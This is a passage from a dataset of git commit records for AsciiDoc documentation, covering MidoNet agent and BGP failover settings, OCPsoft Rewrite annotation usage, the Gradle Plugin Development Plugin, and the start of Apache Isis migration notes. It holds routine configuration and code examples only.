options in the +agent.datapath+ of mn-conf(1) to tune the pool's size\nand its buffers. One pool is created for each output channel, the settings\ndefined here will apply to each of those pools.\n\nIf you notice decreased performance because packet sizes exceed the maximum\nbuffer size, you can increase the value for the buf_size_kb setting. This\nsetting controls the buffer size (in KB). Be aware that the buffer size puts a\nlimit on the packet size that the MidoNet Agent can send. In a network that\njumbo frames traverse, adjust the size so one buffer will accommodate a whole\nframe, plus enough room for the flow's actions.\n\n== BGP failover configuration\n\nThe default BGP fail-over time is 2-3 minutes. However, you can reduce this time\nby changing some parameters on both ends of the session: in +mn-conf(1)+\n(the MidoNet side) and the remote end BGP peer configuration. The example\nbelow shows how to reduce the BGP fail-over time to one minute on the MidoNet\nside:\n\n[source]\n----\nagent {\n midolman {\n bgp_connect_retry=1\n bgp_holdtime=3\n bgp_keepalive=1\n }\n}\n----\n\nThe settings in mn-conf must match those on the remote end BGP peer configuration.\nFor more information about how to set them, see xref:bgp_failover[].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07ca5455a69b4979c7cbf3ef7a3fab763f2ba0cf","subject":"Typo in index.asciidoc.","message":"Typo in index.asciidoc.\n","repos":"jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/annotations\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/annotations\/index.asciidoc","new_contents":":toc:\n:toclevels: 4\n\n== Rewrite Annotations\n\ntoc::[]\n\nThe Rewrite annotation support offers an alternative way to configure Rewrite. Compared to configuring\nRewrite using a +ConfigurationProvider+, the annotations allow to place the configuration very close\nto the affected code, which some people prefer over a central configuration.\n\nPlease note that the Rewrite annotations are not as flexible as a +ConfigurationProvider+.\nThe main focus of the annotations is to simplify the most common usecases which usually occur\nmany times in an application. A good example for this are +Join+ rules which are used very often.\n\nNOTE: Of course you can use a +ConfigurationProvider+ and the annotations side by side. \n\n=== Configuration\n\nThe annotation support of Rewrite is enabled by default. So you usually don't have do add any\nadditional configuration to use annotations.\n\nIf you care about the performance of the annotation scanning process, you can tell Rewrite which\npackages to scan for annotations. Restricting the packages may increase performance if you have\na large number of classes in your application.\n\nTo tell Rewrite to scan only a specific package including all subpackes, add the following entry\nto your +web.xml+:\n\n[source,xml]\n.Restrict annotation scanning to a specific package\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>com.example.myapp<\/param-value>\n<\/context-param>\n----\n\nIf you want to disable the annotation scanning completely, set the package to scan to +none+ like this:\n\n[source,xml]\n.Disable annotation scanning\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>none<\/param-value>\n<\/context-param>\n----\n\nBy default Rewrite will only scan the contents of your +\/WEB-INF\/classes+ directory. \nSometimes it makes sense to also scan the JAR files located in\n+\/WEB-INF\/lib+. This may be the case if your are developing a highly modular application\nwhich is split into different JAR files. \n\nYou can tell Rewrite to also scan the JAR files in +\/WEB-INF\/lib+ by adding the \nfollowing configuration to your +web.xml+: \n\n[source,xml]\n.Tell Rewrite to scan JAR files for annotations\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.SCAN_LIB_DIRECTORY<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\n\n=== Defining rules with annotations\n\nOne of the most common Rewrite rule types is the +Join+ which maps a _virtual_ path to a physical \nserver resource. If you are using the +ConfigurationProvider+ way of configuration, adding a join\nusually looks like this:\n\n[source,java]\n.A basic join using the fluent Java API\n----\n.addRule(Join.path(\"\/welcome\").to(\"\/faces\/welcome.xhtml\"))\n----\n\nIf you want to configure this rule using the Rewrite annotations API, you can do it like this:\n\n[source,java]\n.A basic join using Rewrite annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/welcome\", to=\"\/faces\/welcome.xhtml\")\npublic class WelcomePage {\n \/\/ your code\n}\n----\n\nAs you can see in this example, using the Rewrite annotations is straight forward. Just add\na +@Join+ annotation to your class and set the +path+ and +to+ attributes just like you would\nusing the fluent Java API.\n\nTIP: When using web frameworks like JSF, it is recommended to place the annotation on the class\nwhich is mainly responsible for the corresponding page.\n\nIn some cases it is desired to add an additional +Condition+ to a rule. A good example for this\nare additional security checks for an URL. To add such a constraint, just add the corresponding annotation to\nyour class like shown in the following example.\n\n[source,java]\n.Adding a security constraint to a Join\n----\n@Named\n@RequestScoped\n@RolesRequired(\"ADMIN\")\n@Join(path=\"\/users\", to=\"\/faces\/user-list.xhtml\")\npublic class UserListPage {\n \/\/ your code\n}\n----\n\nIn this example the +Join+ rules is only applied if the user as the required JAAS role.\n\nTIP: If Rewrite doesn't provide an existing annotation for your specific usecase, you can create your\nown one very easily. Have a look at <<custom-annotations,Building custom annotations>> to learn how\nto do this.\n\n\n=== Handling parameters\n\nParameters are a very important concept in Rewrite. They allow you to specify a _dynamic_ part of your\nURL used to identify the resource the user is trying to access.\n\nWhen using the +ConfigurationProvider+ API, you declare parameters like this:\n\n[source,java]\n.A join with parameters\n----\n.addRule(Join.path(\"\/user\/{name}\").to(\"\/faces\/user-details.xhtml\"))\n----\n\nIf you want to define such a rule using Rewrite annotations, add the parameter\nto the path just like you would using the +ConfigurationProvider+:\n\n[source,java]\n.Using parameters with @Join annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserDetailsPage {\n \/\/ your code\n}\n----\n\nRewrite will automatically turn the parameter into a query parameter with the same name. So\nyou can access the value simply by calling +HttpServletRequest.getParameter()+:\n\n[source,java]\n.Accessing parameters using the Servlet API\n----\nString username = request.getParameter(\"name\");\n----\n\nOf cause it is not very nice to spread such low level Servlet API calls across your code. \nTherefore Rewrite also supports _parameter bindings_ which allow you to automatically\ninject the parameter values into managed bean properties.\n\nTo inject the parameters into a property of you bean, just add a +@Parameter+ annotation\nto the corresponding field like this:\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter(\"name\")\n private String username;\n\n}\n----\n\nTIP: If you don't specify the name of the parameter in the annotation, Rewrite will instead \nuse the name of the field. So you don't have to specify the name if the name of the field\nmatches the name of the parameter.\n\n[[parameter-custom-regex-pattern]]\n==== Custom matching patterns\n\nBy default Rewrite parameters will match any character except for the path delimiter +\/+.\nInternally Rewrite uses the regular expression +[^\/]++ for matching the value of the parameter.\nIn some situations it can be useful to customize this pattern. Especially if the standard\npattern matches too greedy or if you want to match more than a single path segment.\n\nIf you want to customize the regular expression used for the matching, just add a +@Matches+\nannotation to the corresponding field. The following class contains a parameter that will\nmatch only lowercase letters and digits.\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter\n @Matches(\"[a-z0-9]+\")\n private String name;\n\n}\n----\n\n==== Custom validation\n\nMany parameter validation requirements can be implemented using regular expressions like shown\nin the <<parameter-custom-regex-pattern,previous section>>. If your validation rules are more\ncomplex, you can use Rewrite's support for custom validators.\n\nA validator must implement the interface +Validator+. The only method in this interface is\ncalled +isValid()+ and must return +true+ if the parameter is valid and +false+ otherwise.\nThe following example shows an validator which validates that the length of a parameter value\nis even.\n\n[source,java]\n.Example for a custom validator\n----\npublic class EvenLengthValidator implements Validator<String>\n{\n\n @Override\n public boolean isValid(Rewrite event, EvaluationContext context, String value)\n {\n return value.trim().length() % 2 == 0;\n }\n\n}\n----\n\nTo use such a custom validator, add a +@Validate+ annotation to your field and refer to the type\nof the validator you wish to use:\n\n[source,java]\n.Using @ValidateWith for custom vaidation\n----\n@Named\n@RequestScoped\n@Join(path=\"\/some-path\/{value}\", to=\"\/faces\/some-page.xhtml\"\")\npublic class SomePage {\n\n @Parameter\n @Validate(with = EvenLengthValidator.class)\n private String value;\n\n}\n----\n\nTIP: If you are using the JSF integration module, you can also refer to standard JSF validators without\nthe need to create a Rewrite-specific one. Refer to the JSF integration module documentation\nfor details.\n\n\n\n\n=== Invoking methods\n\nTODO\n\n[[custom-annotations]]\n\n=== Building custom annotations\n\nTODO","old_contents":":toc:\n:toclevels: 4\n\n== Rewrite Annotations\n\ntoc::[]\n\nThe Rewrite annotation support offers an alternative way to configure Rewrite. Compared to configuring\nRewrite using a +ConfigurationProvider+, the annotations allow to place the configuration very close\nto the affected code, which some people prefer over a central configuration.\n\nPlease note that the Rewrite annotations are not as flexible as a +ConfigurationProvider+.\nThe main focus of the annotations is to simplify the most common usecases which usually occur\nmany times in an application. A good example for this are +Join+ rules which are used very often.\n\nNOTE: Of cause you can use a +ConfigurationProvider+ and the annotations side by side. \n\n=== Configuration\n\nThe annotation support of Rewrite is enabled by default. So you usually don't have do add any\nadditional configuration to use annotations.\n\nIf you care about the performance of the annotation scanning process, you can tell Rewrite which\npackages to scan for annotations. Restricting the packages may increase performance if you have\na large number of classes in your application.\n\nTo tell Rewrite to scan only a specific package including all subpackes, add the following entry\nto your +web.xml+:\n\n[source,xml]\n.Restrict annotation scanning to a specific package\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>com.example.myapp<\/param-value>\n<\/context-param>\n----\n\nIf you want to disable the annotation scanning completely, set the package to scan to +none+ like this:\n\n[source,xml]\n.Disable annotation scanning\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.BASE_PACKAGES<\/param-name>\n <param-value>none<\/param-value>\n<\/context-param>\n----\n\nBy default Rewrite will only scan the contents of your +\/WEB-INF\/classes+ directory. \nSometimes it makes sense to also scan the JAR files located in\n+\/WEB-INF\/lib+. This may be the case if your are developing a highly modular application\nwhich is split into different JAR files. \n\nYou can tell Rewrite to also scan the JAR files in +\/WEB-INF\/lib+ by adding the \nfollowing configuration to your +web.xml+: \n\n[source,xml]\n.Tell Rewrite to scan JAR files for annotations\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.annotation.SCAN_LIB_DIRECTORY<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\n\n=== Defining rules with annotations\n\nOne of the most common Rewrite rule types is the +Join+ which maps a _virtual_ path to a physical \nserver resource. If you are using the +ConfigurationProvider+ way of configuration, adding a join\nusually looks like this:\n\n[source,java]\n.A basic join using the fluent Java API\n----\n.addRule(Join.path(\"\/welcome\").to(\"\/faces\/welcome.xhtml\"))\n----\n\nIf you want to configure this rule using the Rewrite annotations API, you can do it like this:\n\n[source,java]\n.A basic join using Rewrite annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/welcome\", to=\"\/faces\/welcome.xhtml\")\npublic class WelcomePage {\n \/\/ your code\n}\n----\n\nAs you can see in this example, using the Rewrite annotations is straight forward. Just add\na +@Join+ annotation to your class and set the +path+ and +to+ attributes just like you would\nusing the fluent Java API.\n\nTIP: When using web frameworks like JSF, it is recommended to place the annotation on the class\nwhich is mainly responsible for the corresponding page.\n\nIn some cases it is desired to add an additional +Condition+ to a rule. A good example for this\nare additional security checks for an URL. To add such a constraint, just add the corresponding annotation to\nyour class like shown in the following example.\n\n[source,java]\n.Adding a security constraint to a Join\n----\n@Named\n@RequestScoped\n@RolesRequired(\"ADMIN\")\n@Join(path=\"\/users\", to=\"\/faces\/user-list.xhtml\")\npublic class UserListPage {\n \/\/ your code\n}\n----\n\nIn this example the +Join+ rules is only applied if the user as the required JAAS role.\n\nTIP: If Rewrite doesn't provide an existing annotation for your specific usecase, you can create your\nown one very easily. Have a look at <<custom-annotations,Building custom annotations>> to learn how\nto do this.\n\n\n=== Handling parameters\n\nParameters are a very important concept in Rewrite. They allow you to specify a _dynamic_ part of your\nURL used to identify the resource the user is trying to access.\n\nWhen using the +ConfigurationProvider+ API, you declare parameters like this:\n\n[source,java]\n.A join with parameters\n----\n.addRule(Join.path(\"\/user\/{name}\").to(\"\/faces\/user-details.xhtml\"))\n----\n\nIf you want to define such a rule using Rewrite annotations, add the parameter\nto the path just like you would using the +ConfigurationProvider+:\n\n[source,java]\n.Using parameters with @Join annotations\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserDetailsPage {\n \/\/ your code\n}\n----\n\nRewrite will automatically turn the parameter into a query parameter with the same name. So\nyou can access the value simply by calling +HttpServletRequest.getParameter()+:\n\n[source,java]\n.Accessing parameters using the Servlet API\n----\nString username = request.getParameter(\"name\");\n----\n\nOf cause it is not very nice to spread such low level Servlet API calls across your code. \nTherefore Rewrite also supports _parameter bindings_ which allow you to automatically\ninject the parameter values into managed bean properties.\n\nTo inject the parameters into a property of you bean, just add a +@Parameter+ annotation\nto the corresponding field like this:\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter(\"name\")\n private String username;\n\n}\n----\n\nTIP: If you don't specify the name of the parameter in the annotation, Rewrite will instead \nuse the name of the field. So you don't have to specify the name if the name of the field\nmatches the name of the parameter.\n\n[[parameter-custom-regex-pattern]]\n==== Custom matching patterns\n\nBy default Rewrite parameters will match any character except for the path delimiter +\/+.\nInternally Rewrite uses the regular expression +[^\/]++ for matching the value of the parameter.\nIn some situations it can be useful to customize this pattern. Especially if the standard\npattern matches too greedy or if you want to match more than a single path segment.\n\nIf you want to customize the regular expression used for the matching, just add a +@Matches+\nannotation to the corresponding field. The following class contains a parameter that will\nmatch only lowercase letters and digits.\n\n[source,java]\n.Using @Parameter to inject parameter values\n----\n@Named\n@RequestScoped\n@Join(path=\"\/user\/{name}\", to=\"\/faces\/user-details.xhtml\"\")\npublic class UserListPage {\n\n @Parameter\n @Matches(\"[a-z0-9]+\")\n private String name;\n\n}\n----\n\n==== Custom validation\n\nMany parameter validation requirements can be implemented using regular expressions like shown\nin the <<parameter-custom-regex-pattern,previous section>>. If your validation rules are more\ncomplex, you can use Rewrite's support for custom validators.\n\nA validator must implement the interface +Validator+. The only method in this interface is\ncalled +isValid()+ and must return +true+ if the parameter is valid and +false+ otherwise.\nThe following example shows an validator which validates that the length of a parameter value\nis even.\n\n[source,java]\n.Example for a custom validator\n----\npublic class EvenLengthValidator implements Validator<String>\n{\n\n @Override\n public boolean isValid(Rewrite event, EvaluationContext context, String value)\n {\n return value.trim().length() % 2 == 0;\n }\n\n}\n----\n\nTo use such a custom validator, add a +@Validate+ annotation to your field and refer to the type\nof the validator you wish to use:\n\n[source,java]\n.Using @ValidateWith for custom vaidation\n----\n@Named\n@RequestScoped\n@Join(path=\"\/some-path\/{value}\", to=\"\/faces\/some-page.xhtml\"\")\npublic class SomePage {\n\n @Parameter\n @Validate(with = EvenLengthValidator.class)\n private String value;\n\n}\n----\n\nTIP: If you are using the JSF integration module, you can also refer to standard JSF validators without\nthe need to create a Rewrite-specific one. Refer to the JSF integration module documentation\nfor details.\n\n\n\n\n=== Invoking methods\n\nTODO\n\n[[custom-annotations]]\n\n=== Building custom annotations\n\nTODO","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dcbe6891812a5dc8fd9f023fdbd2c9044adddac","subject":"Enforce one sentence per line","message":"Enforce one sentence per line\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/core-plugins\/java_gradle_plugin.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/core-plugins\/java_gradle_plugin.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[java_gradle_plugin]]\n= Gradle Plugin Development Plugin\n\nThe Java Gradle Plugin development plugin can be used to assist in the development of Gradle plugins.\nIt automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library (`java-library`)>> plugin, adds the `gradleApi()` dependency to the `api` configuration and performs validation of plugin metadata during `jar` task execution.\n\nThe plugin also integrates with <<test_kit.adoc#test_kit,TestKit>>, a library that aids in writing and executing functional tests for plugin code.\nIt automatically adds the `gradleTestKit()` dependency to the `testImplementation` configuration and generates a plugin classpath manifest file consumed by a `GradleRunner` instance if found.\nPlease refer to <<test_kit.adoc#sub:test-kit-automatic-classpath-injection,Automatic classpath injection with the Plugin Development Plugin>> for more on its usage, configuration options and samples.\n\n\n[[sec:gradle_plugin_dev_usage]]\n== Usage\n\nTo use the Java Gradle Plugin Development plugin, include the following in your build script:\n\n.Using the Java Gradle Plugin Development plugin\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=use-java-gradle-plugin-plugin]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=use-java-gradle-plugin-plugin]\"]\n====\n\nApplying the plugin automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library(`java-library`)>> plugin and adds the `gradleApi()` dependency to the `api` configuration.\nIt also adds some validations to the build.\n\nThe following validations are performed:\n\n* There is a plugin descriptor defined for the plugin.\n* The plugin descriptor contains an `implementation-class` property.\n* The `implementation-class` property references a valid class file in the jar.\n* Each property getter or the corresponding field must be annotated with a property annotation like `@InputFile` and `@OutputDirectory`.\nProperties that don't participate in up-to-date checks should be annotated with `@Internal`.\n\nAny failed validations will result in a warning message.\n\nFor each plugin you are developing, add an entry to the `gradlePlugin {}` script block:\n\n.Using the gradlePlugin {} block.\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=gradle-plugin-block]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=gradle-plugin-block]\"]\n====\n\nThe `gradlePlugin {}` block defines the plugins being built by the project including the `id` and `implementationClass` of the plugin.\nFrom this data about the plugins being developed, Gradle can automatically:\n\n* Generate the plugin descriptor in the `jar` file's `META-INF` directory.\n* Configure the <<plugins.adoc#sec:plugin_markers,Plugin Marker Artifact>> publications (Maven or Ivy) for each plugin.\n* Publish each plugin to the Gradle Plugin Portal (see <<publishing_gradle_plugins.adoc#publishing_portal,Publishing Plugins to Gradle Plugin Portal>> for details), but only if the link:https:\/\/plugins.gradle.org\/docs\/publish-plugin[Plugin Publishing Plugin] has also been applied.\n\n[[sec:gradle_plugin_dev_interactions]]\n== Interactions\n\nSome of the plugin's behaviour depends on other, related plugins also being applied in your build, namely the <<publishing_maven.adoc#publishing_maven,Maven Publish (`maven-publish`)>> and <<publishing_ivy.adoc#publishing_ivy,Ivy Publish (`ivy-publish`)>> plugins.\n\nOther plugins auto apply the Java Gradle Plugin, like the link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish[Plugin Publishing Plugin].\n\n=== Maven Publish Plugin\n\nWhen the Java Gradle Plugin (`java-gradle-plugin`) detects that the Maven Publish Plugin (`maven-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.maven.MavenPublication.html[MavenPublications]:\n\n* a single \"main\" publication, named `pluginMaven`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerMaven` (for example in the above example it would be `simplePluginPluginMarkerMaven`)\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Ivy Publish Plugin\n\nWhen the Java Gradle Plugin(`java-gradle-plugin`) detects that the Ivy Publish Plugin (`ivy-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.ivy.IvyPublication.html[IvyPublications]:\n\n* a single \"main\" publication, named `pluginIvy`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerIvy` (for example in the above example it would be `simplePluginPluginMarkerIvy`)\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Plugin Publish Plugin\n\nStarting from link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish\/1.0.0[version 1.0.0, the Plugin Publish Plugin] always auto-applies the Java Gradle Plugin (`java-gradle-plugin`) and the Maven Publish Plugin (`maven-publish`).","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[java_gradle_plugin]]\n= Gradle Plugin Development Plugin\n\nThe Java Gradle Plugin development plugin can be used to assist in the development of Gradle plugins. It automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library (`java-library`)>> plugin, adds the `gradleApi()` dependency to the `api` configuration and performs validation of plugin metadata during `jar` task execution.\n\nThe plugin also integrates with <<test_kit.adoc#test_kit,TestKit>>, a library that aids in writing and executing functional tests for plugin code. It automatically adds the `gradleTestKit()` dependency to the `testImplementation` configuration and generates a plugin classpath manifest file consumed by a `GradleRunner` instance if found. Please refer to <<test_kit.adoc#sub:test-kit-automatic-classpath-injection,Automatic classpath injection with the Plugin Development Plugin>> for more on its usage, configuration options and samples.\n\n\n[[sec:gradle_plugin_dev_usage]]\n== Usage\n\nTo use the Java Gradle Plugin Development plugin, include the following in your build script:\n\n.Using the Java Gradle Plugin Development plugin\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=use-java-gradle-plugin-plugin]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=use-java-gradle-plugin-plugin]\"]\n====\n\nApplying the plugin automatically applies the <<java_library_plugin.adoc#java_library_plugin,Java Library(`java-library`)>> plugin and adds the `gradleApi()` dependency to the `api` configuration. It also adds some validations to the build.\n\nThe following validations are performed:\n\n* There is a plugin descriptor defined for the plugin.\n* The plugin descriptor contains an `implementation-class` property.\n* The `implementation-class` property references a valid class file in the jar.\n* Each property getter or the corresponding field must be annotated with a property annotation like `@InputFile` and `@OutputDirectory`. Properties that don't participate in up-to-date checks should be annotated with `@Internal`.\n\nAny failed validations will result in a warning message.\n\nFor each plugin you are developing, add an entry to the `gradlePlugin {}` script block:\n\n.Using the gradlePlugin {} block.\n====\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/groovy\",files=\"build.gradle[tags=gradle-plugin-block]\"]\ninclude::sample[dir=\"snippets\/java\/javaGradlePlugin\/kotlin\",files=\"build.gradle.kts[tags=gradle-plugin-block]\"]\n====\n\nThe `gradlePlugin {}` block defines the plugins being built by the project including the `id` and `implementationClass` of the plugin. From this data about the plugins being developed, Gradle can automatically:\n\n* Generate the plugin descriptor in the `jar` file's `META-INF` directory.\n* Configure the <<plugins.adoc#sec:plugin_markers,Plugin Marker Artifact>> publications (Maven or Ivy) for each plugin.\n* Publish each plugin to the Gradle Plugin Portal (see <<publishing_gradle_plugins.adoc#publishing_portal,Publishing Plugins to Gradle Plugin Portal>> for details), but only if the link:https:\/\/plugins.gradle.org\/docs\/publish-plugin[Plugin Publishing Plugin] has also been applied.\n\n[[sec:gradle_plugin_dev_interactions]]\n== Interactions\n\nSome of the plugin's behaviour depends on other, related plugins also being applied in your build, namely the <<publishing_maven.adoc#publishing_maven,Maven Publish (`maven-publish`)>> and <<publishing_ivy.adoc#publishing_ivy,Ivy Publish (`ivy-publish`)>> plugins.\n\nOther plugins auto apply the Java Gradle Plugin, like the link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish[Plugin Publishing Plugin].\n\n=== Maven Publish Plugin\n\nWhen the Java Gradle Plugin (`java-gradle-plugin`) detects that the Maven Publish Plugin (`maven-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.maven.MavenPublication.html[MavenPublications]:\n\n* a single \"main\" publication, named `pluginMaven`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerMaven` (for example in the above example it would be `simplePluginPluginMarkerMaven`)\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Ivy Publish Plugin\n\nWhen the Java Gradle Plugin(`java-gradle-plugin`) detects that the Ivy Publish Plugin (`ivy-publish`) is also applied by the build, it will automatically configure the following link:{groovyDslPath}\/org.gradle.api.publish.ivy.IvyPublication.html[IvyPublications]:\n\n* a single \"main\" publication, named `pluginIvy`, based on the <<java_plugin.adoc#sec:java_plugin_publishing,main Java component>>\n* multiple <<plugins.adoc#sec:plugin_markers,\"marker\" publications>> (one for each plugin defined in the `gradlePlugin {}` block), named `<pluginName>PluginMarkerIvy` (for example in the above example it would be `simplePluginPluginMarkerIvy`)\n\nThis automatic configuration happens in a link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:afterEvaluate(org.gradle.api.Action)[Project.afterEvaluate()] block (so at the end of the <<build_lifecycle.adoc#sec:build_phases,build configuration phase>>), and only if these publications haven't already been defined, so it's possible to create and customise them during the earlier stages of build configuration.\n\n=== Plugin Publish Plugin\n\nStarting from link:https:\/\/plugins.gradle.org\/plugin\/com.gradle.plugin-publish\/1.0.0[version 1.0.0, the Plugin Publish Plugin] always auto-applies the Java Gradle Plugin (`java-gradle-plugin`) and the Maven Publish Plugin (`maven-publish`).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7dafa5436cba15e4f4350dd685d175d088f4ad0e","subject":"ISIS-2484: add migration notes on auto-create schema","message":"ISIS-2484: add migration notes on auto-create schema","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2020\/2.0.0-M5\/mignotes.adoc","new_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2020\/2.0.0-M5\/mignotes.adoc","new_contents":"= Migrating from M4 to M5\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\nWARNING: Not released yet.\n\n== Removal of Image Value Type\n\nSome Java classes and\/or packages have been renamed\/moved:\n\n[source,java]\n.Applib\n----\n\/\/ org.apache.isis.applib.value.Image\norg.apache.isis.legacy.applib.value.Image \/\/ <.>\n----\n<.> only kept to ease migration, use `java.awt.image.BufferedImage` instead, which is supported by the framework as value type\n\n\n== Removal of deprecated Contributees\n\n.Config\n[source,java]\n----\nisis.core.metaModel.validator.serviceActionsOnly=true \/\/ <.>\nisis.core.metaModel.validator.mixins-only=true \/\/ <.>\n----\n<.> `@DomainService(natureOfService=VIEW\/REST)` is now solely used for UI menu action providers and REST end-points.\nThere is no longer the need to validate uses of `natureOfService=DOMAIN` as this option was removed.\n<.> Support for services that contribute members to other `DomainObjects` was removed. Use `Mixins` instead.\n\nSee the former java-doc for hints on how to migrate the previous options.\n\n.@DomainService(natureOfService=...)\n[source,java]\n----\n\/**\n * A <em>programmatic<\/em> 